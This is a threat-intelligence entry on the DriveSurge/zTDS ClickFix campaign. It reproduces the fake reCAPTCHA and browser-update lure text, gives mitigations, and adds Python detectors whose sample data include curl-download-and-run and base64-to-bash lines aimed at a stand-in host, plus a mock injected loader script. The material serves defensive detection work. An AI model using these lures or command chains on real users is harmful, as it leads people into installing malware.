⚠️ Security Warning

ClickFix lures can lead to malware and computer viruses. If you see text like this online, it's likely a scam.


DriveSurge / zTDS ClickFix

DriveSurge is an Initial Access Broker that runs a Pay-Per-Install operation on top of compromised legitimate websites, using the open-source zTDS Traffic Distribution System to inject loader scripts and fingerprint visitors. Depending on the victim's OS it delivers one of several ClickFix variants. On Windows it shows FakeUpdates "your browser is out of date" overlays (impersonating 12 browser brands) or a ClickFix PowerShell paste. On macOS it silently rewrites the clipboard via navigator.clipboard.writeText and presents a fake reCAPTCHA modal ("I am not a robot - reCAPTCHA Verification ID: ") instructing the victim to open Terminal and paste, executing a curl-download-and-run or base64-decode-and-pipe-to-bash chain. The injected loaders use distinctive zTDS URL signatures (t.js?site=, t..js, ext-b..js, jsrepo?rnd=, banner-js.php), synchronous-XHR script injection, and site-owner evasion (skipping logged-in WordPress admins). Reported by Silent Push in 2026.

Tags: cross-platform, browser, CLI, GUI

I am not a robot - reCAPTCHA Verification ID: . To verify you are human, open Terminal and paste (Command + V) the verification code, then press Return.

  1. Open Spotlight (Command + Space) and type Terminal

  2. Press Command + V to paste the 'verification code'

  3. Press Return to run it

Mitigations:

  • Educate macOS users that legitimate CAPTCHAs never ask you to paste into Terminal

  • Alert on Terminal child processes spawning curl/bash shortly after a browser session

  • Monitor for curl ... -o <file> && bash <file> and base64 -D | bash execution chains

  • Block known DriveSurge/zTDS payload infrastructure at the DNS/proxy layer
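
The two execution chains named in the mitigations above (curl download-then-run, and base64 decode piped to bash) can be matched in process-execution telemetry. The following detector is an added example written for this entry; it is not code from Silent Push or from the zTDS project. It assumes (not stated on the page) that telemetry arrives as one JSON object per line with the keys ts, parent, process and cmdline, and that a parent of Terminal or iTerm2 marks a pasted, interactive command; the sample events are constructed.

```python
"""Detect macOS ClickFix execution chains (curl -o <file> && bash <file>,
base64 -D | bash, curl | bash) in process-execution telemetry.

Added example for this entry; not code from the original page or from
Silent Push. Telemetry format and the sample events below are assumptions."""
import json
import re

# Patterns for the chains called out in the mitigations. Each is applied to
# the flattened command line of a single process-start event.
PATTERNS = {
    # curl ... -o <file> && bash <file>: download to disk, then execute it
    "curl_download_then_bash": re.compile(
        r"\bcurl\b[^&|;]*\s-o\s*\S+[^&|;]*&&\s*(?:ba)?sh\b", re.I),
    # base64 -D ... | bash: macOS base64 decodes with -D (GNU uses -d)
    "base64_decode_pipe_bash": re.compile(
        r"\bbase64\b[^|]*\s-[dD]\b[^|]*\|\s*(?:ba)?sh\b", re.I),
    # curl ... | bash: download straight into the shell, nothing on disk
    "curl_pipe_bash": re.compile(
        r"\bcurl\b[^|]*\|\s*(?:ba)?sh\b", re.I),
}

# Parents that indicate a human pasted the command into a terminal window,
# which is the ClickFix pattern (assumed list, extend for your fleet).
TERMINAL_PARENTS = {"Terminal", "iTerm2"}


def classify(cmdline):
    """Return the names of every chain pattern that matches a command line."""
    return [name for name, pat in PATTERNS.items() if pat.search(cmdline)]


def scan_events(lines):
    """Parse JSON-per-line telemetry and return a list of suspicious events.

    Each hit records the timestamp, the parent process, whether the parent
    is an interactive terminal, and which chain patterns matched."""
    hits = []
    for line in lines:
        if not line.strip():
            continue
        evt = json.loads(line)
        matched = classify(evt.get("cmdline", ""))
        if matched:
            hits.append({
                "ts": evt["ts"],
                "parent": evt["parent"],
                "from_terminal": evt["parent"] in TERMINAL_PARENTS,
                "patterns": matched,
            })
    return hits


# Constructed sample telemetry (not real captured data). The first two lines
# mimic the pasted "verification code"; the last two are benign look-alikes.
SAMPLE_EVENTS = """\
{"ts": "2026-06-01T10:00:01Z", "parent": "Terminal", "process": "bash", "cmdline": "curl -fsSL http://example.invalid/u.sh -o /tmp/u && bash /tmp/u"}
{"ts": "2026-06-01T10:00:02Z", "parent": "Terminal", "process": "bash", "cmdline": "echo ZWNobyBoaQ== | base64 -D | bash"}
{"ts": "2026-06-01T10:05:00Z", "parent": "launchd", "process": "bash", "cmdline": "/usr/local/bin/backup.sh --full"}
{"ts": "2026-06-01T10:06:00Z", "parent": "Terminal", "process": "bash", "cmdline": "curl -s https://example.invalid/version.txt -o /tmp/version.txt"}
"""

if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS.splitlines()):
        print(hit)
```

The fourth sample event shows why the download-and-run pattern insists on the `&& bash` half: a plain `curl -o` is common in build scripts and should not fire on its own. In a real deployment, weight hits where `from_terminal` is true and a browser was active seconds earlier, which is the sequence the mitigation above describes.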


Contributor: Michael Haag (2026-06-01)

Your browser is out of date. A critical update is required to continue. Download and run the update to keep browsing securely.

  1. Click the Update / Download button on the fake browser-update overlay

  2. Run the delivered 'Browser Update.exe' (or paste the provided PowerShell 'fix')

Mitigations:

  • Browsers update themselves — treat any web page demanding a manual browser update as malicious

  • Block execution of freshly-downloaded 'Browser Update.exe' style binaries via WDAC/AppLocker

  • Detect injected TDS loaders (t.js?site=, jsrepo?rnd=, banner-js.php) in web traffic

  • Hunt compromised CMS sites for zTDS injection and the wordpress_logged_in_ admin-evasion check
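
The last two mitigations (detecting zTDS loader URLs in web traffic, and hunting CMS sites for the injection plus the wordpress_logged_in_ check) can be implemented as one scan over fetched page bodies. The scanner below is an added example for this entry, not code from Silent Push or the zTDS project. The URL markers are taken verbatim from the description above (t..js and ext-b..js are matched literally as written there); the regex for a synchronous XMLHttpRequest assumes the usual open(method, url, false) call shape, and the two sample page bodies are constructed.

```python
"""Scan HTML/JS bodies (proxy captures, CMS crawls) for the zTDS loader
indicators listed on this page: distinctive loader URLs, synchronous-XHR
script injection, and the WordPress admin-cookie evasion check.

Added example for this entry; not code from the original page, Silent Push
or the zTDS project. Sample bodies and the XHR call shape are assumptions."""
import re

# URL fragments the page lists as distinctive zTDS loader signatures.
ZTDS_URL_MARKERS = ("t.js?site=", "t..js", "ext-b..js", "jsrepo?rnd=", "banner-js.php")

# Synchronous XHR: the third argument to open() is false (assumed call shape).
SYNC_XHR = re.compile(
    r"""\.open\s*\(\s*['"](?:GET|POST)['"]\s*,[^,]+,\s*false\s*\)""", re.I)

# Any absolute URL in the body; filtered against the markers below.
URL_RE = re.compile(r"""https?://[^\s"'<>]+""")


def extract_loader_urls(body):
    """Return absolute URLs in the body that carry a zTDS marker."""
    return [u for u in URL_RE.findall(body)
            if any(m in u for m in ZTDS_URL_MARKERS)]


def find_indicators(body):
    """Return a dict of the indicators present in a page body (empty if none)."""
    found = {}
    markers = [m for m in ZTDS_URL_MARKERS if m in body]
    if markers:
        found["ztds_url_markers"] = markers
    if SYNC_XHR.search(body):
        found["sync_xhr_injection"] = True
    # Site-owner evasion: loader reads document.cookie and looks for the
    # wordpress_logged_in_ cookie so that logged-in admins never see the lure.
    if "wordpress_logged_in_" in body and "document.cookie" in body:
        found["wp_admin_evasion"] = True
    return found


def verdict(body):
    """Classify a body as ("suspicious", indicators) or ("clean", {})."""
    indicators = find_indicators(body)
    return ("suspicious" if indicators else "clean"), indicators


# Constructed fixture: a blog page carrying an injected loader stub with the
# three indicators. The fetched script is not evaluated here; the fixture only
# needs to contain the markers a scanner would see.
INJECTED_PAGE = """<html><head><title>Example Blog</title>
<script>
if (document.cookie.indexOf("wordpress_logged_in_") === -1) {
  var x = new XMLHttpRequest();
  x.open("GET", "https://tds.example.invalid/t.js?site=1234&rnd=" + Math.random(), false);
  x.send();
}
</script></head><body>Welcome</body></html>"""

# Constructed fixture: an ordinary WordPress page with a normal script tag.
CLEAN_PAGE = """<html><head><script src="/wp-includes/js/jquery.js"></script></head>
<body>Welcome</body></html>"""

if __name__ == "__main__":
    for name, body in (("injected", INJECTED_PAGE), ("clean", CLEAN_PAGE)):
        print(name, verdict(body), extract_loader_urls(body))
```

Run it over the HTML of every page a crawler fetches from your own CMS sites, or over proxy-captured response bodies; a hit on the URL markers alone is enough to block at the proxy, while the admin-cookie check is the strongest sign that a site you operate is itself compromised rather than merely linking out.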


Contributor: Michael Haag (2026-06-01)